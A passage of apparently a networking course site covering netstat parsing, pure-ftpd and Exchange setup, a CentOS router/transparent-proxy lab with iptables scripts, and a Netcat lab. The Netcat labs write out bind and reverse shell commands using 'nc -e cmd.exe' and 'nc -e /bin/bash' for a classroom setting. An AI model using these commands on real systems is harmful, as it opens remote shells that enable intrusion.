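        pid, _, program = fields[6].partition("/")
        rows.append({"proto": fields[0], "local_addr": addr, "port": int(port),
                     "state": fields[5], "pid": int(pid) if pid.isdigit() else None,
                     "program": program.strip()})
    return rows


def listening_ports(text):
    """port -> (bind address, program) for every socket in LISTEN state."""
    return {r["port"]: (r["local_addr"], r["program"])
            for r in parse_netstat(text) if r["state"] == "LISTEN"}


def is_listening(text, port):
    return port in listening_ports(text)


def exposed_ports(text):
    """Listening ports bound to every interface (0.0.0.0 or ::), i.e. reachable
    from the network rather than only from localhost."""
    return sorted(port for port, (addr, _) in listening_ports(text).items()
                  if addr in ("0.0.0.0", "::"))


if __name__ == "__main__":
    for port in (22, 80, 21):
        print(f"port {port}: {'listening' if is_listening(SAMPLE_NETSTAT, port) else 'not listening'}")
    print("exposed to the network:", exposed_ports(SAMPLE_NETSTAT))
```

On the sample, 22 and 80 are listening and exposed, 631 is listening but only on the loopback address, and 21 is absent because pure-ftpd has not been started yet. On a real host you would feed it the live output (for example via subprocess.run(["netstat", "-antp"], capture_output=True, text=True).stdout as root, since the program column is hidden from unprivileged users).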

Your server's accessible web directory is located in /var/www/ and is where you would put your webpages.

If you want instructions on how to install HTTPD Apache in Ubuntu go here


FTPD

FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21 and transfers files on port 20.

The steps to setting up pure-FTPd:

Installation (pure-ftpd is installed by default in BackTrack; on another Linux distribution, use apt-get on Debian-based systems or yum on Red Hat-based systems)
   #apt-get install pure-ftpd
   #yum install pure-ftpd

Configuration to add a FTP user and setup an FTP directory
   #groupadd ftpgroup
   #useradd -g ftpgroup -d /dev/null -s /etc ftpuser
   #pure-pw useradd <your ftp username> -u ftpuser -d /home/ftp/pub/<your ftp username>
     You will be prompted to input a password twice   
   #pure-pw mkdb   
   #cd /etc/pure-ftpd/auth
   #ln -s ../conf/PureDB 60pdb
   #mkdir /home/ftp
   #mkdir /home/ftp/pub
   #mkdir /home/ftp/pub/<your ftp username>
   #chown -R ftpuser:ftpgroup /home/ftp/pub/<your ftp username>
   #/etc/init.d/pure-ftpd restart

Test your install of Pure-FTPd by FTPing to your loopback IP address
   #ftp 127.0.0.1
   key in your <ftp username>
   key in your <ftp password>


 

Install Server 2008 R2 and Exchange Server 2010


Overview

Installing Microsoft Exchange Server can be a daunting task. There are some pre-installation decisions and preparations to be made. You will need to check to see if your version of Windows Server 2003 (32bit or 64bit), 2008, or 2008R2 is compatible with the version of Exchange Server (2007 or 2010) that you are planning to install. There are also a lot of options on how you can run your Exchange install, either using the GUI Setup Wizard, a command line install, or a scripted install.

By default Exchange Server 2007 and 2010 are 64-bit, although you can install 2007 in 32-bit for a non-production test environment. Here are my recommendations of what could work for you in the lab or at home:

  • Server 2008 R2 and Exchange Server 2010 (64 bit) - The newest architecture is recommended
  • Server 2008 and Exchange Server 2007 (64 bit)
  • Server 2003 (64 bit) and Exchange Server 2007 (64bit)
  • Server 2003 (32 bit) and Exchange Server 2007 (32bit) - If you can only run 32 bit

Hardware Requirements

Exchange Server 2007/2010

How many servers will Exchange Server roles be installed on 1, 2, 3 or 4 separate servers?
64 bit architecture (Yes please)
2 Gig RAM (min)
Enough hard disc storage space to support your users. In order to achieve this you could use:
   - a local hard drive or drives
   - a SAN (storage area network) storage system
   - an iSCSI (IP SCSI) NAS (network-attached storage)

Pre-Installation Checklist

For an install of Exchange Server 2007/2010 to work you will need the following things installed or added to your Windows Server platform. (3, 4, and 5 below are installed by default when installing Server 2008 or using the Exchange setup wizard):

  1. Active Directory -  (add role)
  2. DNS - (add role)
  3. The server will need to be a Domain Controller (dcpromo) and Global Catalog Server
  4. .NET framework
  5. Microsoft Management Console (MMC)
  6. Windows PowerShell
  7. Microsoft IIS - (add role)
  8. WWW Publishing Services - (add role):
          You may need to specify many of the IIS services (like IIS 6.0 and XML 6.0) and make sure the WWW server is running
  9. Net.Tcp Port Sharing Service will need to be set to automatic (Go to Start > Run > services.msc > and look for Net.Tcp Port Sharing)

The Exchange Server 2007/2010 setup wizard makes the process a lot easier. The wizard will run through a checklist of items to make sure your system meets the necessary requirements. If your computer does not meet the requirements you will be prompted to search and install the necessary tools that the installation requires.

Exchange Server Mail Roles

When installing Exchange Server you need to decide which specific mail roles or servers you will need. There are five different servers within Exchange Server that you can install:

Mailbox Server
Client Access Server
Hub Transport Server
Unified Messaging Server
Edge Transport Server

In this class you will need to install the Mailbox, Client Access and Hub Transport servers. The Unified Messaging Server and Edge Transport Server are typically installed on separate servers and are not needed for a small test installation.


 

Video Tutorials 

Install Active Directory, DNS and IIS and promote the server to a DC and GCS

Install Exchange Server 2010



 

Route, NAT, and Transparent Proxy, with CentOS Linux


Overview

It is useful to protect your network by filtering web requests and other types of traffic, and a proxy server is designed to do this. You can create a Linux proxy server using Squid and SquidGuard, and configure the network settings in your users' browsers to use the proxy server, which then applies rules that filter the requests. However, a browser-side proxy setting can be bypassed by the host computer.

A stronger alternative is to create a transparent proxy server and configure your router to forward all web related requests to the proxy server, that way your network hosts are forced to go through the transparent proxy. A potential problem with that scenario is that you need to have a fairly decent router, which can forward interior traffic on a specified port, to the proxy server on the local area network. A third alternative is to make your transparent proxy server also handle routing, NAT, DHCP, and DNS. It would seem like that would be a huge undertaking, but it can actually be done fairly quickly, using a computer and a distribution of Linux.


Lab Outline

To create a Linux proxy server that also functions as a router and more, it is recommended to use a server distribution of Linux like CentOS Linux, which is the freely distributed equivalent of Red Hat Enterprise Linux. Along with Debian, CentOS is one of the most popular server distributions of Linux available. For this lab, we download and burn CentOS 6.2, i386 (32-bit) or x86_64 (64-bit), ISO DVDs Parts 1 and 2. Pick a CentOS 6.2 mirror with direct DVD downloads and download the DVD ISO files to burn as installation DVDs.

Once you have the CentOS installation DVD iso files downloaded and burned to DVD you need to install the operating system to a computer. You can choose to install to an actual computer or to a virtual computer (virtual machine). In order to do this lab from home, and if you do not have a lot of extra computers lying around, I recommend doing the whole project virtually through the use of virtual machines. For a virtualization platform, I recommend downloading either VMware Player or Virtualbox.

If you decide to follow along with the video tutorials and set up a CentOS server virtual machine and convert it into a router, remember that the IP addressing scheme will need to be modified to work with your personal network. Just because my wireless network uses a 192.168.2.0 /24 local addressing scheme does not mean that yours does also, in fact your network most likely uses a different scheme like 192.168.1.0 /24.


Network diagram of a CentOS proxy server and router using virtual machines


In the lab at the college we installed CentOS to actual physical computers. Normally, I recommend using computers with two network interface cards (NICs) installed, but the computers we had available to us had only one network interface card (NIC). This posed a challenge since the traffic would need to flow through the computers, from one network to another, implying the need for two network interface cards. We fixed this problem by configuring VLANs, and assigning IP addresses to subinterfaces on the computer's single NIC. We then connected to a switchport configured for trunking with the same VLANs as we created on the computer.   

Network diagram of a CentOS proxy server-router implementation using a lab computer
with only one network interface card (NIC) and a switch configured with VLANs and trunks


Lab Steps Overview (virtualized machines or physical machines)

a. Understand the benefits of a transparent proxy and a Linux server that can also route, NAT, etc. Plan and diagram your lab. See video tutorial part 1 below.

b. Download CentOS installation ISO files, i386 or x86_64, DVDs. See Lab Outline above and video tutorial part 2 below.

c. To do this lab on physical computers you will need one computer for the CentOS server, preferably with two NICs (one is workable too), and another computer to act as a test LAN host.

To do this lab virtually using a virtualization platform like VMware or VirtualBox, first create a new virtual machine for the Linux operating system. You will probably need to choose Red Hat Enterprise 32-bit or 64-bit and walk through all the settings. At the end, configure your virtual CD/DVD drive to boot from the CentOS installation ISO file that you downloaded. Make sure to add or enable two virtual network interfaces (NICs). In VMware, set the first NIC to Bridged Networking mode and the second NIC to NAT mode (then, once it is saved, change it again to LAN segment mode); in VirtualBox set the second NIC to Internal Network mode. See video tutorial part 2 below.

d. Configure network addressing on your server's two network interfaces as well as your test host's network addressing. See video tutorial part 3 below.

e. Configure routing and NATing using iptables on your server. See video tutorial part 4 below.

f. Install and configure Squid as a transparent proxy server. Configure iptables to port-forward web traffic to the server on port 3128 (Squid). See video tutorial part 5 below.

g. Secure your server by configuring iptables to accept and reject specific types of traffic. Install and configure DHCP server on your CentOS server in order to hand out IP addresses on your local network. See video tutorial part 6 below.


Lab Command Steps

Here is a list of the commands used in this lab project:

1. If you are working in my lab or have a computer with only one network card (NIC), jump to step 2. If you are using a virtual or physical computer with two NICs (e.g. eth0 and eth1), you will need to configure each NIC with the commands below, then jump to step 6. You can receive an IP address dynamically through DHCP from your router/gateway on eth0: click on the network manager in the upper right of the task bar and click "auto ethernet", or just click on "eth0" to activate DHCP. Then you will need to manually configure the second NIC using an ifconfig command from the terminal (e.g. ifconfig eth1 192.168.111.1); you will need root access to do this. After you have activated DHCP on eth0 and manually configured eth1, use the ifconfig command to check your interface IP addresses and confirm that you have an address for both eth0 and eth1. You are now ready to jump to step 6.
su - 
ifconfig eth1 192.168.111.1
ifconfig

2. If you are working in my lab or you have a computer with only one network interface card (NIC), you will need to configure trunking and two VLANs (e.g. 110, 111) on the CentOS Linux server.
vconfig add eth0 110 (in my college lab we use VLAN110 for the 192.168.11.x network)
vconfig add eth0 111 

vconfig rem eth0 111 (removes a VLAN trunk)

3. To configure sub-interfaces in order to assign an IP address to each VLAN, in our classroom lab we use VLAN110 for the 192.168.11.0 network.
ifconfig eth0.110 192.168.11.xxx
ifconfig eth0.111 192.168.111.xxx 

4. To configure a default gateway/route
route add default gw 192.168.11.1

5. To configure DNS servers
echo "nameserver 4.2.2.2" > /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf

6. To add kernel support for IP forwarding (routing) we set a flag with the following command
sysctl -w net.ipv4.ip_forward=1

7. To set up NATing we can configure the iptables NAT table for masquerading.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  (assuming eth0 is the outside interface)
or
iptables -t nat -A POSTROUTING -o eth0.110 -j MASQUERADE  (assuming the eth0.110 sub-interface is the outside interface) 

8. To install the Squid proxy server
yum install squid
cd /etc/squid

9. Edit the squid.conf file and change the following line to enable transparent proxy mode:
http_port 3128
to
http_port 3128 intercept

10. Issuing one of the following commands will restart the Squid service or reload the configuration file
service squid restart
service squid reload

11. Add an entry to the iptables NAT table to port-forward inbound web traffic arriving on the inside interface (LAN side) to the Squid server on port 3128 (assuming eth1 is the inside interface with the IP address 192.168.111.1):

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to-destination 192.168.111.1:3128

12. To get routing and forwarding to work correctly you will also need to remove some statements from the iptables tables that reject traffic. The following commands remove the REJECT rules from the INPUT chain and the FORWARD chain of the filter table.
iptables -t filter -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -t filter -D FORWARD -j REJECT --reject-with icmp-host-prohibited

At first glance, it seems that there is a rule in the iptables INPUT chain (third line) that accepts any protocol from any source to any destination. The following statement would delete the third line of the filter table INPUT chain, the "accept any anywhere anywhere" line: <iptables -t filter -D INPUT 3>. Do not use it, because as it turns out, that particular line carries information that does not appear in the output of an <iptables -L> command. Run the following command and compare its output to the results of <iptables -L>:
iptables-save

You can see that the third line (-A INPUT -i lo -j ACCEPT) actually accepts all input on the loopback (lo) interface only, and since that is just the loopback (i.e. 127.0.0.1) the rule is not a problem: it does not indiscriminately accept all input on the outside interface. So to clarify, in the following three commands (see below), the first command shows the current iptables rules, the second command removes line 3 (-A INPUT -i lo -j ACCEPT), which is the line that ACCEPTs packets on the loopback interface in the INPUT chain of the filter table, and the third command puts it back in the same position. To learn how to do this I referred to the iptables man pages <man iptables>.
iptables-save
iptables -t filter -D INPUT 3
iptables -t filter -I INPUT 3 -i lo -j ACCEPT

13. Now you can look at your iptables, default filter table, and nat table, using the following commands
iptables -L -t filter
iptables -L -t nat  

14. Now you can add (append) to the iptable filter table with the following commands, to accept input on port 3128 for Squid, and reject all other types of traffic
iptables -t filter -A INPUT -p tcp --dport 3128 -j ACCEPT
iptables -t filter -A INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -L -t filter
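Steps 6 to 14 build the firewall one rule at a time, which is why step 12 has to juggle rule positions. As an added example, not part of the original lab, the shell function below produces the same policy as one file in iptables-restore format, so the whole ruleset can be read and checked before it touches a running box, and then loaded with iptables-restore (the file-based workflow used later in Part 2). It goes a little beyond the lab: Squid's port and DHCP are accepted only on the inside interface, and FORWARD lets LAN hosts out and established replies back in instead of forwarding everything. Interface names, the LAN prefix and the proxy address and port are parameters whose defaults (eth0 outside, eth1 inside, 192.168.111.0/24, Squid at 192.168.111.1:3128) are the lab's values; the ssh rule is an assumption.

```shell
#!/bin/sh
# Added example: emit the router / transparent-proxy firewall from the lab as an
# iptables-restore file. Review the output, then load it as root with
# iptables-restore. Defaults are the lab's values; every one can be overridden.

gen_ruleset() {
    out_if=${1:-eth0}               # outside (WAN) interface, or eth0.11 on a single NIC
    in_if=${2:-eth1}                # inside (LAN) interface, or eth0.111 on a single NIC
    lan=${3:-192.168.111.0/24}      # LAN prefix
    proxy=${4:-192.168.111.1}       # address Squid listens on (the inside interface)
    proxy_port=${5:-3128}           # Squid's intercept port
    cat <<EOF
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
# step 11: web requests from LAN hosts are redirected to Squid instead of going out directly
-A PREROUTING -i $in_if -s $lan -p tcp --dport 80 -j DNAT --to-destination $proxy:$proxy_port
# step 7: everything leaving the outside interface is masqueraded behind its address
-A POSTROUTING -o $out_if -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
# step 14, narrowed: Squid is reachable from the LAN side only
-A INPUT -i $in_if -p tcp --dport $proxy_port -j ACCEPT
# DHCP requests from LAN hosts (step 15) and ssh administration from the LAN (an assumption)
-A INPUT -i $in_if -p udp --dport 67 -j ACCEPT
-A INPUT -i $in_if -p tcp --dport 22 -j ACCEPT
# the catch-all REJECT must stay last: rules appended after it are never reached
-A INPUT -j REJECT --reject-with icmp-host-prohibited
# step 12, narrowed: forward LAN hosts out, and only replies back in
-A FORWARD -i $in_if -s $lan -o $out_if -j ACCEPT
-A FORWARD -i $out_if -o $in_if -m state --state ESTABLISHED,RELATED -j ACCEPT
-A FORWARD -j REJECT --reject-with icmp-host-prohibited
COMMIT
EOF
}

# Ordering check for a ruleset read on stdin: is the last rule of the named
# chain the catch-all REJECT? Exit status 0 means yes.
reject_is_last() {
    grep "^-A $1 " | tail -n 1 | grep -q -- '-j REJECT'
}

# Usage (as root, after reading the output):
#   gen_ruleset > /root/iptables.conf                     # two NICs, lab defaults
#   gen_ruleset eth0.11 eth0.111 > /root/iptables.conf    # single NIC with VLAN subinterfaces
#   reject_is_last INPUT < /root/iptables.conf && iptables-restore < /root/iptables.conf
```

Lines starting with # are ignored by iptables-restore, so the comments can stay in the file you save under /etc/sysconfig/iptables. The ordering check matters because of exactly the problem step 14 runs into: an ACCEPT appended after the catch-all REJECT never matches anything.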


 

15. The following commands are used to install a DHCP server in CentOS. You will need to elevate to root, run updates, then install:
su -
yum update
yum install dhcp

16. You should see that the DHCP server fails on starting up, this is because we have not configured it yet. To configure the DHCP server we need to edit the dhcpd.conf file located in /etc/dhcp.
cd /etc/dhcp
ls

17. You should see a file called dhcpd.conf . You will want to edit the file in a text editor like Vim or Nano.
vim /etc/dhcp/dhcpd.conf
or
nano /etc/dhcp/dhcpd.conf

Here is a screenshot of my dhcpd.conf file after I edited it in Vim. The cat command is used to output the file to the terminal for viewing. The lines that begin with # are comments and not active configurations. You could duplicate what you see in my configuration file below, replacing every line that has 192.168.11.x ip addressing with your own network number, like 192.168.1.x, etc.:
cat /etc/dhcp/dhcpd.conf


IPTABLES Overview

iptables consists of four separate tables: filter, nat, mangle, and raw. Each table holds a set of chains, and each chain is an ordered list of rules.

filter - the filter table is the default table, used when no -t argument is given. The filter table has three chains: INPUT for traffic destined for a local socket, FORWARD for packets being routed through the server, and OUTPUT for packets generated locally on the machine.

nat - the nat table is consulted when a packet creates a new connection. The nat table has three chains: PREROUTING, OUTPUT, and POSTROUTING.

mangle - the mangle table is used for specialized packet alteration. The mangle table has the following chains: PREROUTING, POSTROUTING, INPUT, FORWARD, and OUTPUT.

raw - the raw table is used for configuring exemptions from connection tracking.

Video Tutorials

In part 1, I outline creating a Linux proxy server and router and I diagram the network

In part 2, I create the VMware virtual machine with two NICs and install CentOS

In part 3, I configure network addressing on the CentOS server and a Fedora client

In part 4, I review network addressing and how to do the lab if the server has only one network interface. I also set up routing and NATing on the CentOS server

In part 5, I install Squid on the CentOS server and configure it to be a transparent proxy. I configure the iptables NAT table to port-forward all local web traffic to the CentOS server on port 3128.

In part 6, I continue to configure iptables and I install and configure DHCP server on the CentOS server.


Netcat and Bind Shells


Netcat and Bind Shells Overview

Netcat is a network connection tool that can read from and write to TCP and UDP ports. It can play the role of either a server or a client for almost any purpose: a web server, a mail server, a chat server, or any other kind of server. It can be used to transfer files or to serve any process, even a command shell. "It is all things to all people for all reasons" - Steve B.

Netcat is installed by default in BackTrack. The Linux binary is located at /bin/nc and the Windows binary at /pentest/windows-binaries/tools/nc.exe

Netcat was created in 1996 and is to this day still considered a great network debugging and testing tool. In 2005 the makers of Nmap created an updated version of Netcat called Ncat that offers additional features like SSL support. Ncat is installed with Nmap for Windows. You can download an updated version of Ncat for Windows at this website: http://nmap.org/ncat/. Scroll to the bottom and look for the Windows binary.

sbd is a netcat clone that offers encryption and runs on Windows or Linux. You can find it and many other netcat related tools here: http://packetstormsecurity.org/UNIX/netcat/ 

A good overview about netcat: http://en.wikipedia.org/wiki/Netcat

Lab 1 - Set up a netcat connection between two hosts (send text)

  1. Connect to your XPclient (or any network host) and run netcat. The class XPclients have nc.exe in the extras folder.
  2. Copy and paste nc.exe into your C:\WINDOWS\ directory so that you will have it available in your command PATH
  3. Open a command prompt and type:
            >nc -lvp 4444   //sets netcat to listen verbosely on port 4444
  4. Check with Netstat
            >netstat -an | FIND "4444"   //netcat is listening on tcp port 4444
  5. Go to your BackTrack client and open a terminal and type:
            #nc <ip address you are connecting to>  4444   //connect with netcat on port 4444
  6. You should eventually see an open connection; try typing "hello" back and forth between the clients.

Lab 2 - Transfer files using netcat (pipe to a file)

  1. In BackTrack use your favorite text editor and type a sentence of text. Save the file as fileshare.txt
  2. In your XPclient type this into the command prompt:
            >nc -lvp 2233 > fileshare.txt
  3. From a BackTrack terminal type in the following commands:
            #nc <the IP address> 2233 < fileshare.txt 
  4. Check your XPclient to see if you received the file. 
  5. How would you make the listener (the server) send the file instead of receiving it?

Lab 3 - Bind a command prompt to a port, creating a Bind Shell (the server listens with a shell attached)

  1. In your XPclient open a command prompt and type this:
            >nc -lvp 7777 -e cmd.exe    //this sets cmd.exe to execute on port 7777 when a connection is established
  2. In your BackTrack client open a terminal window and type this:
            #nc <the ip address to connect to> 7777   //connect with netcat on port 7777
  3. If you are successful you will eventually see a windows command shell in your BackTrack terminal. You bound a shell (cmd.exe) to a port and served it.

Lab 4 - Create a reverse Bind Shell (the client sends the shell)

  1. In your XPclient open a command prompt and type this:
            >nc -lvp 7777    //this sets netcat to listen on port 7777(server)
  2. In the BackTrack client, in a terminal window, type the following:
            #nc -nv <the ip address> 7777 -e /bin/bash   //sends a bash shell over port 7777 to the listening nc server on the Windows client
  3. If you are successful you will receive a shell on the XPclient in which you can type bash commands. Try running an ls command. You will not see a # prompt.


Lab 5 - World's simplest web server (pipe a html file to a port)

  1. Create or download a simple webpage save it to the current directory and then put this command in a terminal
            #cat index.html | nc -vl 80
  2. Now on another computer on your network connect to that IP address and view the webpage


Route, NAT, and Transparent Proxy, with CentOS Linux - Part 2


CentOS Routing and Proxy Cont.

In the previous article, I covered installing CentOS server and converting it to a router, address translator, and transparent proxy. I also covered installing a DHCP server to serve IP addresses to the interior local network. The entire process was recorded in a series of video tutorials (see previous article) and posted to YouTube.

Now that we have configured the iptables forwarding rules, manually configured our interfaces with IP addresses, as well as the default gateway and our DNS nameservers we need to save our configurations. We also need to cover installing BIND and having our CentOS server function as a DNS server as well.


Saving your iptables configuration

You can use terminal commands to make changes to iptables, which instantly affect the Linux firewall. This is similar to the difference between a Cisco router's startup-config file and its running-config in RAM: changes to the running-config take effect immediately but are not permanent unless saved to the startup-config. It is the same with iptables. If you have made changes to iptables using iptables terminal commands, they directly affect the Linux firewall, but the changes will not be permanent unless they are saved to the iptables configuration file.

There are different approaches to making changes to iptables: the approach we have been using so far is to make the changes to the iptables directly, using terminal commands; another approach is to save a test iptables configuration file and then load it, to test it out. Since we have been using the first approach we need to save our configuration to a file and then replace the default iptables configuration file. Before you replace the default file it is a good idea to create a backup. This command will take the current running iptables configuration which we have manipulated and altered, and save it to a .conf text file. You can save it to the root home folder.
iptables-save > iptables.conf

Now cat your saved iptables.conf file to look it over.
cat iptables.conf

The first command listed below makes a backup of the original default iptables configuration file, and the second command replaces the iptables configuration file with the current configuration, that was just saved as iptables.conf. Now, if the computer needs to be restarted the new configuration will be maintained.
cp /etc/sysconfig/iptables /etc/sysconfig/iptables.bak
mv iptables.conf /etc/sysconfig/iptables

You may decide that it is smarter and safer to make changes to the Linux iptables firewall indirectly, by editing a test iptables.conf file before testing it out on the actively running iptables firewall. In this way, you make all your changes to the iptables.conf file and then load it to memory, instead of using iptables terminal commands to experiment with your running configuration and possibly compromise your security or disrupt your network users. With the following commands you save the current iptables to an iptables.conf text file, then edit it with a text editor, then restore it to a running state in active memory. The iptables-restore command is a beneficial command because it loads the edited config file to the running iptables without disrupting the service and potentially dropping the running network host connections.
iptables-save > iptables.conf
nano iptables.conf  (edit the iptables.conf configuration file)
iptables-restore < iptables.conf  (load the edited iptables.conf file into the running iptables)
mv iptables.conf /etc/sysconfig/iptables  (replace the iptables configuration file with the edited version)

Note: For a demonstration of this tutorial, see the video below: Use CentOS Linux for Routing, Proxy, NAT, DHCP - Part 7


Saving manual network interface configurations

A regular desktop installation of CentOS Server comes with the Network Manager program. Network Manager is a graphical management tool used to manage and configure network interfaces in an easy way. It was personally recommended to me to not use the Network Manager, but instead manually configure my network interfaces, meaning Ethernet ports with IP addressing, subnet masks, default gateway address, and DNS servers. Like with iptables, you can manually configure your network interfaces using terminal line commands, but if you restart the server your configurations will not be saved. In order to configure your network interfaces in a manner that will persist, you need to configure the network interface configuration files or scripts.
ls /etc/sysconfig/network-scripts/

You should see configuration files named ifcfg-eth0, ifcfg-lo, or some other variant of ifcfg-<name> where <name> refers to the network interface name. To inspect the interface configuration you can output the text of the config file using cat
cat /etc/sysconfig/network-scripts/ifcfg-eth0

You will see some output like the following:
 DEVICE="eth0"
 NM_CONTROLLED="yes"
 ONBOOT="no"
 TYPE=Ethernet
 BOOTPROTO=dhcp
 DEFROUTE=yes
 IPV4_FAILURE_FATAL=yes
 IPV6INIT=no

This information tells us that Network Manager is managing the interface, the interface is not activated by default when the system boots up, and that the system is using DHCP to acquire an IP address. In order to manually configure the network interface you will need to change these settings and add some additional settings as well. Before you change the settings of the interfaces it is a good idea to create backup configuration files.  
cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.bak
cp /etc/sysconfig/network-scripts/ifcfg-eth1 /etc/sysconfig/network-scripts/ifcfg-eth1.bak

Now you can configure your interfaces by altering the configuration files in a text editor like Vim or Nano
nano /etc/sysconfig/network-scripts/ifcfg-eth0

Now alter and add the necessary settings and IP addressing for your outside interface. In my eth0 example below, I am on the 192.168.2.0/24 network using a static IP address of 192.168.2.98, a twenty-four bit subnet mask, and a gateway located at 192.168.2.1. The changed and added lines are NM_CONTROLLED, ONBOOT, BOOTPROTO, IPADDR, NETMASK and GATEWAY:
 DEVICE="eth0"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 TYPE=Ethernet
 BOOTPROTO=none
 DEFROUTE=yes
 IPADDR=192.168.2.98  <whatever IP address your outside interface needs to be set at>
 NETMASK=255.255.255.0
 GATEWAY=192.168.2.1

 IPV4_FAILURE_FATAL=yes
 IPV6INIT=no
 <additional entries not listed>

Save the interface configuration file and exit.

On the inside network interface (in my case eth1), I used the following settings: 
 DEVICE="eth1"
 HWADDR="00:0C:29:12:AE:75"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 IPADDR=192.168.111.1  //the IP address for your inside interface. I chose ".1" since I am the gateway for the inside network
 NETMASK=255.255.255.0

Save the interface configuration file and exit. Now you can issue the following commands to verify your interface configurations and your default route
ifconfig
route

Note: For a demonstration of this tutorial, see the video below: Use CentOS Linux for Routing, Proxy, NAT, DHCP - Part 8


Manual Configuration of Network Interfaces for Trunking and VLANs

At the time of writing this article, the network manager in CentOS does not allow you to configure a network interface with subinterfaces, VLANs, and trunking. In order to configure a single network interface to function as multiple subinterfaces which allow VLANS over a trunked link you need to manually configure your network interface configuration file.

In the following scenario, suppose you have one network interface, eth0, and you want your router to function as a transparent proxy and a router separating an interior network from an exterior network. In the logical topology shown in the diagram, you have the 192.168.111.0/24 network on the interior LAN side and the 192.168.11.0/24 network on the exterior-facing WAN side; of course 192.168.11.0/24 is also in a private address range, but it is on the side of the CentOS server that is closest to the internet. In reality, however, you are physically limited to one network interface (eth0) and will therefore need to convert that one interface into multiple subinterfaces, with VLANs over a trunked link (physical topology).

Looking at the physical topology in the diagram above, the CentOS server has transformed a single network interface eth0 into eth0.11 and eth0.111 for VLAN11 and VLAN111 respectively. From there the server is connected to the switch which has been configured as a trunk to allow VLAN11 and VLAN111. 

Here are the commands and configuration settings needed to configure the CentOS server to fit the scenario depicted in the diagram above. The first step is to back up your default or current network interface configuration file. Then copy the configuration file and rename it for each of the two subinterface VLANs:
cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.bak
cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.11
cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.111

Now you will need to edit all three of your configuration files ifcfg-eth0, ifcfg-eth0.11 and ifcfg-eth0.111 in turn with a text editor like vi, vim, or nano. In configuring ifcfg-eth0 you will only need to make sure that the interface is activated on startup, and that the interface is not managed by the network manager:
vim /etc/sysconfig/network-scripts/ifcfg-eth0

  DEVICE="eth0"
  NM_CONTROLLED="no"
  ONBOOT="yes"
  TYPE=Ethernet

For the inside interface, the LAN side of the router (in the diagram VLAN111, eth0.111), you will mainly need to change the interface name, the IP address and netmask, and add a VLAN setting. The default gateway and DNS settings are configured on the outside-facing interface.
vim /etc/sysconfig/network-scripts/ifcfg-eth0.111

 DEVICE="eth0.111"
 HWADDR="00:0C:29:12:AE:75"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 IPADDR=192.168.111.1  //the IP address for your inside interface. I chose ".1" since I am the gateway for the inside network
 NETMASK=255.255.255.0
 VLAN="yes"

For the outside-facing interface, the WAN side of the router (in the diagram VLAN11, eth0.11), you will mainly need to change the interface name, the IP address and netmask, add a VLAN setting, and add the default gateway and DNS settings.
vim /etc/sysconfig/network-scripts/ifcfg-eth0.11

 DEVICE="eth0.11"
 NM_CONTROLLED="no"
 ONBOOT="yes"
 TYPE=Ethernet
 BOOTPROTO=none
 DEFROUTE=yes
 VLAN="yes"
 IPADDR=192.168.11.100  <whatever IP address your outside interface needs to be set at>
 NETMASK=255.255.255.0
 GATEWAY=192.168.11.1
 DNS1=127.0.0.1  <if your CentOS server will not be running DNS services, use your normal DNS server address instead>
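Writing the three files by hand is where small mistakes creep in (the VLAN line left out, DNS or a gateway on the inside interface). As an added example, not the article's own commands, the shell function below writes ifcfg-eth0, ifcfg-eth0.11 and ifcfg-eth0.111 for the single-NIC scenario into a directory of your choosing, so the files can be inspected before they are copied into /etc/sysconfig/network-scripts; the two-NIC files earlier in the article follow the same layout minus the VLAN line. Interface name, VLAN numbers and addresses default to the diagram's values (eth0, VLAN 11 at 192.168.11.100 with gateway 192.168.11.1, VLAN 111 at 192.168.111.1) and DNS1 to the server itself; all of them are parameters.

```shell
#!/bin/sh
# Added example: generate the ifcfg files for one physical NIC carrying two
# 802.1Q VLANs (outside and inside). Nothing here touches the real
# network-scripts directory unless you pass it as the first argument.

write_vlan_ifcfg() {
    dir=${1:-/etc/sysconfig/network-scripts}
    nic=${2:-eth0}
    wan_vlan=${3:-11}
    wan_ip=${4:-192.168.11.100}
    wan_gw=${5:-192.168.11.1}
    lan_vlan=${6:-111}
    lan_ip=${7:-192.168.111.1}
    dns=${8:-127.0.0.1}          # the server itself, assuming BIND runs on it
    mask=255.255.255.0

    # Physical port: up at boot, no address of its own, left alone by NetworkManager.
    cat > "$dir/ifcfg-$nic" <<EOF
DEVICE="$nic"
NM_CONTROLLED="no"
ONBOOT="yes"
TYPE=Ethernet
BOOTPROTO=none
EOF

    # Outside (WAN) subinterface: the only one with a default route and DNS.
    cat > "$dir/ifcfg-$nic.$wan_vlan" <<EOF
DEVICE="$nic.$wan_vlan"
VLAN="yes"
NM_CONTROLLED="no"
ONBOOT="yes"
BOOTPROTO=none
DEFROUTE=yes
IPADDR=$wan_ip
NETMASK=$mask
GATEWAY=$wan_gw
DNS1=$dns
EOF

    # Inside (LAN) subinterface: an address only; hosts use it as their gateway.
    cat > "$dir/ifcfg-$nic.$lan_vlan" <<EOF
DEVICE="$nic.$lan_vlan"
VLAN="yes"
NM_CONTROLLED="no"
ONBOOT="yes"
BOOTPROTO=none
IPADDR=$lan_ip
NETMASK=$mask
EOF
}

# Read one KEY=value (quotes stripped) back out of an ifcfg file, for checking.
ifcfg_get() {
    sed -n "s/^$2=//p" "$1" | tr -d '"'
}

# Usage: write into a scratch directory first, read it over, then copy the
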